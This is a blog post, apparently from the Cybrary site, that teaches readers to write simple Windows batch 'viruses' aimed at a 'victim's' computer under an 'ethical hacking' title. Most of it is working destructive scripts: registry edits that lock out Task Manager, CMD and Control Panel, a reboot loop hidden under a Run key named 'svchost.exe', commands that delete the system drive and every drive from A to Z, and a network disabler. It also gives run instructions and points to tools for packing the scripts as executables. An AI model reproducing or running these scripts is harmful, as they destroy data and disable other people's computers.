January 21, 2020

Ethical Hacking: How To Use Batch Programming

usman47
Share
sphere-bits-bytes-cybrary

Ethical Hacking: How To Use Batch Programming

Everyone always want to perform ethical hacking easily. This includes using already built tools and exploits for your pentesting.

Have you wondered about the easiest way to create a simple virus for Windows? I did and found that simpler things can get a big job done.

Today, I am going to tell you how to use Batch scripting to create simple but efficient viruses. First a little bit of info about what Batch really is...

Batch File : A batch file is a kind of script file that's created usually using simple text editors. I use Windows CMD commands. It works using command line interpreter and is usually executed by a shell program (Command.com or CMD). These files have  a .bat extension.If you want to learn it,  just Google it. Trust me, it's worth it.Now let me show you some codes that I've used frequently :

  • Mess up the registry : This code can give a hard blow to the registry. This will just kill some resources in such a way that the victim will get very annoyed.

@echo offreg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoRun /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoToolbarsOnTaskbar /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSetTaskBar /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoViewContextMenu /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoTrayContextMenu /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoStartMenuMorePrograms /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSetFolders /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSecurityTab /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoLogOff /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoFind /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDrives /t REG_DWORD /d 03ffffffreg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoClose /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoNetHood /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoNetworkConnections /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v StartMenuLogOff /t REG_DWORD /d 00000000reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v ClassicShell /t REG_DWORD /d 00000000reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSMMyDocs /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSMHelp /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSMConfigurePrograms /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoStartMenuMyMusic /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoSMMyPictures /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoRecentDocsMenu /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoFavoritesMenu /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoStartMenuPinnedList /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoActiveDesktop /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoTrayItemsDisplay /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableChangePassword /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableLockWorkstation /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v NoDispCPL /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v NoDispBackgroundPage /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v NoDispScrSavPage /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v NoDispAppearancePage /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v NoDispSettingsPage /t REG_DWORD /d 00000001reg add HKCUSoftwarePoliciesMicrosoftWindowsSystem /v DisableCMD /t REG_DWORD /d 00000002reg add HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v legalnoticecaption /d Oops..reg add HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v legalnoticetext /d ...Hacked...reg add HKCUSoftwarePoliciesMicrosoftMMC /v RestrictToPermittedSnapins /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced /v Start_ShowPrinters /t REG_DWORD /d 00000000reg add HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced /v Start_AdminToolsRoot /t REG_DWORD /d 00000000reg add HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced /v Start_ShowMyComputer /t REG_DWORD /d 00000000reg add HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced /v WebView /t REG_DWORD /d 00000000reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall /v NoAddRemovePrograms /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall /v NoAddPage /t REG_DWORD /d 00000001reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall /v NoRemovePage /t REG_DWORD /d 00000001reg add HKCUControl PanelInternational /v sTimeFormat /d H:mm:ssreg add HKU.DEFAULTSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced /v WebView /t REG_DWORD /d 00000000exit

  • Crash the OS : This code can just simply crash Windows. Note that you can have problems when using this code because some times it doesn't work.

@echo offerase %systemdrive%*.* /f /s /qexit

  • Keep Victim's Computer Rebooting : Another annoying code which can have tough effects on an inexperienced user. You will also notice that how simple things can leave Windows with no defense.

@echo offreg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /f /v "svchost.exe" /d "shutdown -r -t 00"exit

  • Disable the Victim's Internet : Want to stop someone from accessing the internet? Just use this four lines code.

@echo offipconfig / Releaseif ERRORLEVEL1 ipconfig /release_allexit

  • Erase All Drives : Want to erase every thing? Well its simple in Windows.

@echo offdel A:*.* /f /s /qdel B:*.* /f /s /qdel C:*.* /f /s /qdel D:*.* /f /s /qdel E:*.* /f /s /qdel F:*.* /f /s /qdel G:*.* /f /s /qdel H:*.* /f /s /qdel I:*.* /f /s /qdel J:*.* /f /s /qdel K:*.* /f /s /qdel L:*.* /f /s /qdel M:*.* /f /s /qdel N:*.* /f /s /qdel O:*.* /f /s /qdel P:*.* /f /s /qdel Q:*.* /f /s /qdel R:*.* /f /s /qdel S:*.* /f /s /qdel T:*.* /f /s /qdel U:*.* /f /s /qdel V:*.* /f /s /qdel W:*.* /f /s /qdel X:*.* /f /s /qdel Y:*.* /f /s /qdel Z:*.* /f /s /qexit

How to Use These Codes

Type the code into simple text editors like Notepad and save the file with a .bat extension. Then, just double-click on them to run them.

What's the Potential of Batch Scripting?

It's more than you can imagine. The codes provided above are just a small view of what's  possible. You can even create something like a RAT or a remote file stealer for your pentesting efforts.

Some useful links

I've seen many useful links that I want to share with you guys. Like..

To convert Batch Files to an EXE, use a free tool called ' Batch To Exe Converter ' which has some very cool features. You can grab it here.

Want to learn how to code in Batch? Learn here.

Want to see some more code? Download a software called Viral Tool from here.

Start learning with Cybrary

Create a free account

Related Posts

All Blogs
Building a Security Team
June 27, 2023

Digital Forensics and Incident Response: What It Is, When You Need It, and How to Implement It

A quick guide to digital forensics and incident response (DFIR): what it is, when it’s needed, how to implement a cutting-edge program, and how to develop DFIR skills on your team.

Read More
Building a Security Team
June 28, 2023

How to Build a Red Team

An overview of what a red team is (and isn’t), and practical tips on how to build a Red Team and develop offensive security skills in your team.

Read More
Tools & Applications
June 7, 2023

How to Make the Most of Blending Learning with Cybrary Live

Learn how to get the most from your cybersecurity training platform by blending on-demand learning with virtual, live courses led by industry experts.

Read More
News & Events
June 7, 2023

Introducing the New Cybrary Learner Experience

Cybrary is launching a key update to the Cybrary Learner experience to elevate hands-on learning and measurement as guiding tenets of Cybrary’s mission.

Read More